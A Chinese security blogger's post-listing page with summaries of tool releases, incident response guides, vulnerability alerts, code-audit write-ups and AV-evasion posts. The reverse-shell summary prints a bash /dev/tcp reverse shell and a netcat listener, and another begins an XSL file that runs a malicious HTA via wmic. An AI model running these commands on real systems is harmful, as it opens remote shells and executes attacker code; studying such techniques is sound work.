自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(84)
  • 收藏
  • 关注

原创 一键解密,网络安全神器现已问世!

这款工具是一款功能强大的网络安全综合工具,旨在为安全从业者、红蓝对抗人员和网络安全爱好者提供全面的网络安全解决方案。它集成了多种实用功能,包括解密、分析、扫描、溯源等,为用户提供了便捷的操作界面和丰富的功能选择。

2024-05-07 19:35:23 3898 7

原创 PotatoTool 蓝队版 V1.3 发布:增强功能和性能优化

这款工具是一款功能强大的网络安全综合工具,旨在为安全从业者、红蓝对抗人员和网络安全爱好者提供全面的网络安全解决方案。它集成了多种实用功能,包括解密、分析、扫描、溯源等,为用户提供了便捷的操作界面和丰富的功能选择。经过广大网友的反馈和建议,我们对V1.1版本中存在的问题进行了优化。

2024-07-20 15:14:13 445

原创 Lua 协程模拟 Golang 的 go defer 编程模式

协程间的通信暂时不需要在多线程中实现,因为项目中目前只有一个lua_state对象管理。通过以上封装,可以在Lua中以类似Golang的方式编写协程代码。

2024-05-07 23:02:01 1242

原创 Apereo CAS反序列化漏洞中数据加解密研究

Apereo CAS,全称为 Central Authentication Service,是一种开源的单点登录(SSO)解决方案。4.1.7版本之前存在AES默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。其中蓝队版的一个功能:一键解密流量工具,为实现**一键智能化**因此需要研究一下CAS漏洞利用中execution值的加解密算法!>结论:UUID + _ + 头部长度标识(7byte) + iv长度标识(1byte) + iv值(16byte) + keyN

2023-09-16 18:50:36 1719

原创 关于特殊时期电力行业信息中心运营思路

安全运营是一系列规则、技术和应用的集合,用以保障组织核心业务平稳运行的相关活动,是通过灵活、动态的实施控制以期达到组织和业务需要的整体范围可持续性正常运行。当事件发生时,从蓝队的流程中,经过监控、分析、研判和应急等流程,溯源组的目标是获取红队相关基础设施的权限,并进一步反制攻击者。网络隔离控制:我们根据最小特权原则,对重要系统和数据采取严格的网络访问控制,限制不必要的连接,从而降低了攻击面。灵活应变调整防守策略:我们根据攻防态势的变化,及时调整防守策略,而不僵化地坚守预设模式,以确保应对新威胁的能力。

2023-09-06 17:30:44 1292

原创 邮件钓鱼的防守策略

通过教育员工识别和应对钓鱼攻击,配置有效的邮件过滤与检测系统,加强域名鉴别、多因素身份验证和内部安全控制等,针对邮件系统落实专项安全防守工作,可发现存在重大安全隐患。针对邮件系统的反垃圾、反钓鱼邮件的需求,后续准备在实施域名验证策略上继续加强防护工作,包括使用SPF(发送者策略框架)、DKIM(域密钥标识)和DMARC(域基于邮件验证的报告和合规性)等技术来验证邮件的真实性。同时,监控域名的注册和变更情况,及时发现恶意注册或伪造的域名,提升组织对邮件钓鱼攻击的防御能力,保护网络安全和敏感信息的安全。

2023-09-06 17:10:33 1282

原创 企业互联网暴露面未知资产梳理

当前,互联网新技术的产生推动着各种网络应用的蓬勃发展,网络安全威胁逐渐蔓延到各种新兴场景中,揭示着网络安全威胁不断加速泛化。当前网络存在着许多资产,这些资产关系到企业内部的安全情况,然而这些资产可能被攻击者利用,从而使得恶意攻击者能够获取敏感信息或者控制网络,如何避免上述问题产生,如何梳理企业资产暴露面是关键。帮助企业梳理互联网暴露面资产尤为重要,旨在识别和评估组织或系统在网络上暴露给潜在攻击者的风险和漏洞,帮助企业了解可能受到攻击的所有可能入口和弱点。

2023-09-06 16:46:00 3202

原创 CRMEB多端多语言系统文件上传0Day代审历程

这两天攻防中,某政局子公司官网后台采用的CRMEB开源商城CMS,挺奇葩,别问怎么总让我碰到这种东西,我也不知道,主打的就是一个魔幻、抽象。最后通过审代码,绕过历史漏洞修复的补丁(文章内容可能有点少,没办法,这个代审快到了我只用了5秒)

2023-09-05 16:35:26 2251

原创 ShopXO商城系统文件上传0Day代审历程

这两天攻防中,某政局内网横向发现多网段服务器,该服务器搭建了ShopXO商城系统(后来发现是开发临时搭建的,准备做二开用的)。结果花了30来秒审了个垃圾Day拿下该服务器,本文就是给新手提供思路(没交cnvd,懒)

2023-09-05 15:10:58 2116

原创 CobaltStrike密码爆破、伪造上线以及DDos——csIntruder

本项目包含CobaltStrike密码爆破、伪造上线以及DDos功能。其中伪造上线支持常见魔改版CS。

2023-03-08 17:47:01 2018 3

原创 渗透测试自动化生成报告——ExportReport

本项目用于自动化生成报告。可根据项目需求,通过简单的提取变量来自定义报告模板。内附常见扫描器API/原报告(awvs、xray、goby)数据提取模块,可直接生成全新的自定义报告。对有复杂的功能需求时,适用于有Python基础的人使用。本项目内附二次开发所用的资料文档,欢迎各位提Pull Request。

2023-03-07 18:29:28 2102

原创 Shiro数据解密并反编译工具——ShiroTool

内置100多个key,爆破解密rememberMe加密字段内容,对解密内容进行反序列化,展示反序列化后字节流。根据序列化协议,逐字节读取解析,进行对象结构化展示,ysoserial CommonsBeanutils CommonsCollections等payload都能识别。对涉及class文件的,再进行class反编译出java代码。

2022-10-19 02:30:44 7416

原创 webshell流量一键解密——webshellDecrypt

支持常见webshell流量一键解密(完美兼容php)、AES专项解密(内置50wKey爆破)、各类单项解密(Base64、Rot13、strRev、Chr等)、自定义Js解密

2022-10-19 02:20:06 9047

原创 域名反查、权重查询以及ICP备案查询——ipInfoSearch

ip域名反查、权重查询以及ICP备案查询。便于提交SRC时资产过滤。

2022-10-19 02:07:34 8841 1

原创 文本提取IP并批量自动化情报查询工具——getIpInfo

将文本中含有的IP进行标记、添加IP物理位置标记,并进行输出。提取存在的外网IP,依赖奇安信威胁分析武器库进行批量自动化情报查询,展示IP信誉详情、实现检测详情、恶意详情以及数据统计,并输出xlsx表格。适用于[安服工作]中针对DMZ服务器入站IP批量自动化情报查询;适用于[蓝队监测工作]中针对可疑IP进行批量自动化情报查询;适用于[蓝队溯源工作]中针对攻击IP代理机和肉鸡过滤进行批量自动化情报查询;适用于[应急工作]中主机外联自动化情报查询。

2022-10-18 08:00:59 10384 3

原创 上帝模式下的shellcode

github:https://github.com/Wker666讲解视频:https://www.bilibili.com/video/BV1oY411E7hX?p=1&share_medium=iphone&share_plat=ios&share_session_id=95C6D787-6EF6-4E5E-8954-918AF8B95B10&share_source=WEIXIN&share_tag=s_i&timestamp=1648518475&.

2022-03-29 15:20:08 37803

原创 内网渗透-域管理员定位

目录Part1 内网域渗透基础概念1 什么是域1. 权限管理比较集中,管理成本降低2. 保密性加强3. 安全性加强4. 提高了便捷性2 域渗透思路Part2 域管理员定位基础Part3 域管理员手动定位Part4 自动化收集时常用的域管理员定位工具SPN扫描psloggedon.exePVEFindADUser.exenetview.exeName的NSE脚本PowerView.PS1脚本Part1 内网域渗透基础概念1 什么是...

2022-02-08 22:55:32 78908 1

原创 蜜罐如何获取攻击者敏感信息

目录Part1 前言Part2 原理Part3 mysql数据包分析Part4 蜜罐搭建Part5 资料参考Part1 前言在护网中看到甲方的蜜罐感觉很好玩,就想着自己也搭建一个。然后就看到很多文章讲述用蜜罐获取手机号了什么的,感觉很神奇,就研究了研究。蜜罐获取手机号信息其实就是一个mysql的任意文件读取漏洞,关于这个漏洞已经出现很久了,晚上也有很多关于这个漏洞的文章。但是对于一些入行晚的师傅,可能还不是太了解。本篇文章就来讲述一下mysql蜜罐的原理。Part2 原..

2022-02-07 09:31:54 75982 2

转载 MS17-010 EternalBlue 漏洞分析

转自:圈子社区原文地址:https://www.jianshu.com/u/58a5f9e596a7作者:一个二进制安全菜鸡 猫头鹰安全团队-ZSD目录Part1 简介Part2 漏洞信息1 漏洞存在文件信息2 漏洞利用关键模块信息:3 漏洞介绍Part3 静态分析Part4 动态分析Part5 利用详细Part6 最后Part7 参考Part1 简介永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议漏...

2022-02-06 01:02:04 74219

原创 Linux应急响应排查

上一篇文章说到Windows的应急响应排查,本篇文章就来说说Linux的应急响应排查。首先,前期交互这部分的内容还是不能少的,毕竟掌握的信息越多,排查的思路就越清晰。Part1 熟悉主机环境 uname -a cat /proc/version lsb_release -a 首先,先对排查主机的基本信息有一个了解。Part2 运行进程排查首先熟悉一下ps命令的参数:ps [选项] -e 显示所有进程。...

2022-01-29 16:20:38 79066 3

原创 Windows应急响应

临近冬奥、残奥,发一篇Windows的应急响应,希望对大家有所帮助,下一篇会发Linux的应急响应。

2022-01-28 12:16:44 74707 3

原创 详谈利用系统漏洞及mysql提权

提权,顾名思义就是提升权限,当我们 getshell ⼀个⽹站之后,⼤部分情况下我们的权限是⾮常低的,这时就需要利⽤提权,让原本的低权限(如只允许列⽬录)→ ⾼权限(拥有修改⽂件的能⼒),权限提升后,对接下来的渗透有很⼤帮助

2022-01-25 13:03:14 76822 1

转载 锐捷某系统前台任意文件写入分析

文章转自作者瓜皮辰Part1 前言这套系统我估计是全网第一个公开能拿shell的吧(不是的话当我没说),哪套系统自己猜,这次先分享下前台任意文件写入,还有几个rce日后分享,也感谢独立团孙德胜Alan提供的思路。Part2 代码分析漏洞位置: /view/vpn/autovpn/feature_commit.php先通过POST传参进入if判断在下面的fc_extendsubnet处传参即可进入漏洞位置会将我们传入的参数提交到putConfig...

2022-01-20 09:27:21 72919

转载 wJa (D&S&I)AST javaweb应用程序漏洞分析工具

wJa是一款结合DAST、SAST、IAST的综合性应用程序安全分析工具,支持对java web程序的安全性进行分析,含有反编译,代码审计,调试jar包,代理追踪等用于分析软件安全的功能。

2022-01-14 02:09:15 73815

原创 Golang图片码+压缩伪装+远程调用组合拳

Part1 主要免杀思路首先要将程序进行分离,将shellcode隐藏进图片里,再远程调用图片里的shellcode,达成getshell的目标。同时还要把调用shellcode的执行程序进行伪装,伪装成图片或者其他格式,让目标执行文件时自动拉取shellcode图片,从而上线本篇文章使用了开源项目 https://github.com/Hangingsword/HouQing此处举例用的是Hou Qing大佬基于Golang语言编写的免杀项目Part2 具体过程及手法我们要先保..

2021-12-31 11:54:28 73274

原创 漏洞预警:CVE-2021-45232 Apache APISIX Dashboard 未授权访问(附批量扫描POC)

目录Part1 漏洞描述Part2 风险等级Part3 漏洞影响Part4 漏洞分析4.1 漏洞源码4.2 漏洞验证4.3 POCPart5 修复建议Part1 漏洞描述Apache APISIX 是一个动态、实时、高性能的 API 网关,Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架gin和drople

2021-12-29 15:10:28 75879

转载 记一次hw中的上线骚姿势(异速联+用友U8)

Part1前言这是之前hw中遇到的一个靶标,也是个人参加的hw中第一次拿下4个靶标,这个骚姿势利用起来也很简单,无非就是幸运!!!Part2漏洞应用异速联它将C/S架构转化成B/S架构,降低了对网络带宽的要求。同时,避免在每台电脑的重复安装、调试、更新应用软件,从而降低企业信息化成本,提升工作效率,大大简化部署与管理复杂的计算环境。用友ERP-U8用友ERP-U8是一套企业级的解决方案,可满足不同的制造、商务模式下,不同运营模式下的企业经营管理,U8全面集成了财务、生...

2021-12-27 15:21:04 74224

原创 漏洞预警:Apache Log4j RCE漏洞

目录Part1 漏洞描述Part2 危害等级Part3 漏洞影响Part4 漏洞分析及验证源码分析Part5 漏洞检测自我检测攻击检测产品检测Part6 漏洞修复Part1 漏洞描述Apache Log4j是Apache的一个开源项目,Apache log4j2是Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。近日发现Apache Log4j存在任意代码执行

2021-12-13 11:33:29 75375

原创 论内网渗透中,反弹shell的各种姿势

反弹shell是进入内网的第一步,也是权限提升用到的至关重要的一步。1、bash反弹 攻击机: nc -lvp 4444 客户机: bash -i>& /dev/tcp/10.1.2.2/4444 0>&1命令介绍:nc -i使用监听模式 -v 显示命令执行过程 -p 指定端口号。 -e 执行给定的命令 bash -i使用交互模式, -c 执行跟的命令 重定向 0:标准输入,

2021-12-13 10:30:01 73230

原创 基于Serverless的流量隐匿(四个方面)

——D&X安全实验室目录Part1 前言1 Serverless2 SCFPart2 HTTP代理2.1 新建云函数:https://console.cloud.tencent.com/scf/list2.2 环境信息配置2.3 脚本部署2.4 高级配置-超时时间设置最大2.5 触发器配置-选定由API网关触发2.3 设置API网关路径,并获取最终API网管访问地址2.4 本地流量转发Part3 socks5代理3.1 SCF构建(同http.

2021-12-12 09:31:44 73939

原创 漏洞预警:Gerapy clone 后台远程命令执行漏洞

——D&X安全实验室目录Part1漏洞描述Part2危害等级Part3漏洞影响Part4漏洞分析及验证4.1 登录页面4.2出现漏洞的文件为 gerapy/server/core/views.py4.3 从代码中可以看到 address参数可控,拼接到 cmd中使用 Popen命令执行,构造请求包4.4 抓包,进行验证Part5修复建议Part1 漏洞描述Gerapy 是一款分布式爬虫管理框架,支持 Python3,基于 Scrapy、Scrapy..

2021-12-06 11:22:05 75750

原创 漏洞通报:泛微V9任意文件上传

——D&X安全实验室目录Part1 漏洞描述Part2 危害等级Part3 漏洞影响Part4 漏洞分析及验证(1)环境搭建(2)构造POC(3)漏洞验证Part5 修复建议Part1 漏洞描述泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。该漏洞是由于后端源码中uploadType 参数设为 ...

2021-12-06 11:21:39 70068 2

原创 漏洞预警:gitlab命令执行(CVE-2021-22205)

——D&X安全实验室目录Part1 漏洞描述Part2 危害等级Part3 漏洞影响Part4 漏洞分析及验证(1)使用vulhub搭建环境。2)利用脚本3)查看回显Part5 修复建议Part1 漏洞描述GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。 由于 GitLab 没有正确验证传递给文件解析器的图像文件...

2021-12-06 11:21:07 67434

原创 漏洞预警:CVE-2021-32305 WebSVN 2.6.0 RCE

——D&X安全实验室目录Part1 漏洞描述Part2 危害等级Part3 漏洞影响Part4 漏洞分析及验证源码分析Part5 修复建议Part1 漏洞描述WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。WebSVN官网地址:https://websvnphp.github.i...

2021-12-06 11:20:23 68631

原创 渗透测试指南——工具

——D&X安全实验室工欲善其事,必先利其器。回到过去的旧时代,渗透测试是一件非常困难的事,并且需要大量的手动操作。然而如今,渗透测试工具是"安全军火库"中最常使用的装备,一整套的自动化测试工具似乎不仅改造了渗透测试人员,甚至还可以增强计算机的性能,进行比以往更全面的测试。对渗透测试人员来说不用任何自动化工具对网站或者应用程序进行渗透测试是一件十分困难的事。因此选择一个正确的工具则变得尤为重要,正确的选择甚至占去了渗透测试成功的半壁江山。本篇文章就来和大家介绍一...

2021-11-05 11:47:46 69692 2

原创 Python自定义日志

import loggingimport getpassfrom sys #### 定义MyLog类class MyLog(object): #### 类MyLog的构造函数 def __init__(self): # 返回用户的登录名 self.user = getpass.getuser() self.logger = logging.getLogger(self.user) # 对显示的日志信息设置一个阈值低于DEBUG级别的不显示 self.logger.setLe

2021-10-22 09:16:28 36989

原创 内网信息收集(附脚本)

——D&X安全实验室文中脚本已上传至github:https://github.com/Potato-py/getIntrInfo可打包为可执行文件,可过360、火绒等渗透的本质就是信息收集,信息收集的深度与广度以及对关键信息的提取,影响了后续的方向和手法。当我们拿到webShell后,应该从内到外一步一步收集服务器信息、域信息以及环境信息等,从一个个细节中全面了解内网的部署。以下是总结的部分查询命令:当前用户:whoami /all...

2021-10-03 19:24:10 1208 10

原创 一次简单的XSS 代码审计

——D&X安全实验室0x01 代码分析:1、首先全局搜索常被过滤函数或标签(尽量不要搜索标签,结果太多了不好筛查),此处以onclick为例,未能筛选到相关规则,可替换其他搜索:2、以下为使用script搜索为例,审查筛选相关规则:3、除此之外,我很还可以用搜索常见特征 ’过滤’字段搜索:4、打开safestring.class.php可以看到之所以onclick搜不到是因为使用了正则的方式写的屏蔽on开头诸多函数:5、寻找对应的XSS过..

2021-08-19 09:00:43 466 1

原创 Python免杀

Somethingu have to know: 本Python脚本构建简易的http请求及响应,可通过服务端调用客户端CMD执行命令(可在客户端内置便捷指令 )。同时,脚本使用了PyInstaller,将python解释器及第三方模块进行打包成可执行文件。经测试可免杀绝大多数杀软。0x01 环境准备pip install requests(用于发送请求)pip install pyscreenshot...

2021-08-03 12:37:24 2325 2

原创 shellcode免杀

0x06利用wmic远程文件不落地执行shellcode1、msf生成的hta链接放入hta.xsl文件中,(其中JScript调用mshta运行恶意hta),并将文件放置攻击方服务器<?xml version='1.0'?><stylesheetxmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"xmlns:user="placeholder"..

2021-07-14 18:32:51 1822 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除